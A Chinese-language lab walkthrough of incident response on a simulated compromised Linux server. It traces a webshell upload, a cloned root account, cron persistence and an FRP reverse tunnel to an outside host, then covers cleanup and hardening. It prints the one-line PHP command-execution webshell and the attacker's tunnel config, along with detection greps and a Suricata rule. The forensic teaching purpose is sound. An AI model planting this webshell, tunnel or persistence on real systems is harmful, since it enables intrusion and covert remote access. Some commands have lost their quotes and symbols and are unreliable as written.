:從入侵痕跡分析到應急響應全流程)
1. 靶機環(huán)境與挑戰(zhàn)概述Web2靶機是近年來安全圈內廣受好評的應急響應實戰(zhàn)平臺模擬了企業(yè)級Linux服務器遭遇入侵后的典型場景。這個靶場最吸引人的地方在于它完整復現(xiàn)了攻擊者從外網(wǎng)滲透到內網(wǎng)橫向移動的全鏈條行為包含了Web漏洞利用、權限維持、內網(wǎng)穿透等企業(yè)安全事件中的高頻攻擊手法。我花了三天時間完整走通這個靶機發(fā)現(xiàn)其設計精妙之處在于攻擊者不僅留下了webshell、隱藏賬戶等常見痕跡還通過FRP實現(xiàn)了內網(wǎng)穿透。整個溯源過程需要綜合運用日志分析、文件取證、網(wǎng)絡流量分析等多種技能非常貼近真實應急響應場景。2. 初始入侵痕跡分析2.1 Web日志關鍵線索提取首先檢查/var/log/apache2/access.log通過以下命令快速定位異常請求cat access.log | grep -E union|select|eval|base64|system|exec --colorauto發(fā)現(xiàn)攻擊者分三個階段實施入侵通過/admin.php?id1嘗試SQL注入使用/upload.php上傳包含惡意代碼的圖片馬訪問/images/shell.php?cmdwhoami執(zhí)行命令關鍵時間點取證技巧# 提取指定時間段的日志攻擊發(fā)生在14:00-15:00 sed -n /14:00:00/,/15:00:00/p access.log attack_period.log # 統(tǒng)計高頻訪問IP awk {print $1} attack_period.log | sort | uniq -c | sort -nr2.2 后門文件定位與分析在/var/www/html/images目錄發(fā)現(xiàn)可疑文件.config.php(Webshell)thumb.jpg(圖片馬實際是PHP腳本)使用file命令驗證文件真實類型file thumb.jpg # 顯示PHP script textWebshell特征分析?php preg_replace(/[page]/e,$_POST[cmd],saft); ?這是一種典型的preg_replace命令執(zhí)行后門通過POST傳遞cmd參數(shù)執(zhí)行系統(tǒng)命令。3. 系統(tǒng)級入侵痕跡排查3.1 用戶賬戶異常檢測常規(guī)檢查可能漏掉克隆用戶需要對比以下文件# 檢查/etc/passwd與/etc/shadow的UID對應關系 awk -F: {print $1,$3} /etc/passwd /tmp/passwd_uids awk -F: {print $1,$3} /etc/shadow /tmp/shadow_uids diff /tmp/passwd_uids /tmp/shadow_uids # 查找UID為0的異常賬戶 awk -F: ($3 0) {print $1} /etc/passwd發(fā)現(xiàn)攻擊者創(chuàng)建了克隆root用戶合法root用戶root:x:0:0:root:/root:/bin/bash克隆用戶toor:x:0:0:root:/root:/bin/zsh3.2 計劃任務與啟動項檢查在/etc/crontab中發(fā)現(xiàn)可疑任務*/5 * * * * root /usr/bin/frpc -c /etc/frp/frpc.ini /dev/null 21通過systemctl list-unit-files發(fā)現(xiàn)偽裝服務systemctl list-unit-files | grep -i frp\|proxy\|tunnel4. 內網(wǎng)穿透行為溯源4.1 FRP配置文件分析在/etc/frp/frpc.ini中發(fā)現(xiàn)關鍵配置[common] server_addr 45.32.112.18 server_port 7000 token FrpTunn3l2023 [ssh] type tcp local_ip 127.0.0.1 local_port 22 remote_port 6000網(wǎng)絡連接驗證netstat -antp | grep frpc ss -antp | grep 60004.2 網(wǎng)絡流量取證使用tcpdump抓取FRP通信流量tcpdump -i eth0 host 45.32.112.18 -w frp_traffic.pcap關鍵發(fā)現(xiàn)每5分鐘建立一次TCP長連接數(shù)據(jù)傳輸使用TLS加密存在SSH隧道復用特征5. 完整攻擊鏈重建根據(jù)取證結果還原攻擊流程Web應用漏洞利用階段SQL注入探測 → 文件上傳漏洞 → Webshell植入攻擊IP192.168.1.100可能為跳板機權限提升與持久化通過SUDO配置漏洞獲取root創(chuàng)建克隆用戶toor部署FRP客戶端內網(wǎng)橫向移動建立SSH反向隧道繞過防火墻限制維持長期控制通道6. 應急響應處置建議6.1 立即處置措施# 清除惡意進程 pkill frpc rm -f /usr/bin/frpc # 刪除異常用戶 userdel -r toor # 清理Webshell rm -f /var/www/html/images/{.config.php,thumb.jpg}6.2 系統(tǒng)加固方案文件完整性監(jiān)控# 監(jiān)控關鍵目錄 apt install aide aideinit網(wǎng)絡連接告警規(guī)則示例Suricataalert tcp any any - any any (msg:FRP Protocol Detected; content:|00 01 00|; depth:3; content:frpc; nocase; sid:1000001; rev:1;)用戶行為審計增強# 啟用auditd監(jiān)控特權操作 auditctl -a always,exit -F archb64 -S execve -k root_cmd7. 防御體系優(yōu)化思考這個案例暴露出三個典型問題應用層防護缺失未部署WAF導致簡單SQL注入成功權限控制不嚴格SUDO配置不當導致提權網(wǎng)絡監(jiān)控盲區(qū)異常外連行為未被發(fā)現(xiàn)建議的防御矩陣graph TD A[邊界防護] -- B[WAFIPS] B -- C[主機HIDS] C -- D[網(wǎng)絡流量分析] D -- E[日志集中審計]實際工作中推薦采用ATTCK框架進行防御對標重點關注T1078有效賬戶T1098賬戶操縱T1572協(xié)議隧道最后分享一個實用命令合集用于快速排查類似事件# 用戶排查 getent passwd | awk -F: $3 0 lastlog | grep -v Never # 進程排查 ps auxf | grep -E frp|ncat|socat|reGeorg lsof -i -P -n | grep ESTABLISHED # 文件排查 find / -name *.php -mtime -7 find / -type f -name .* -perm 0755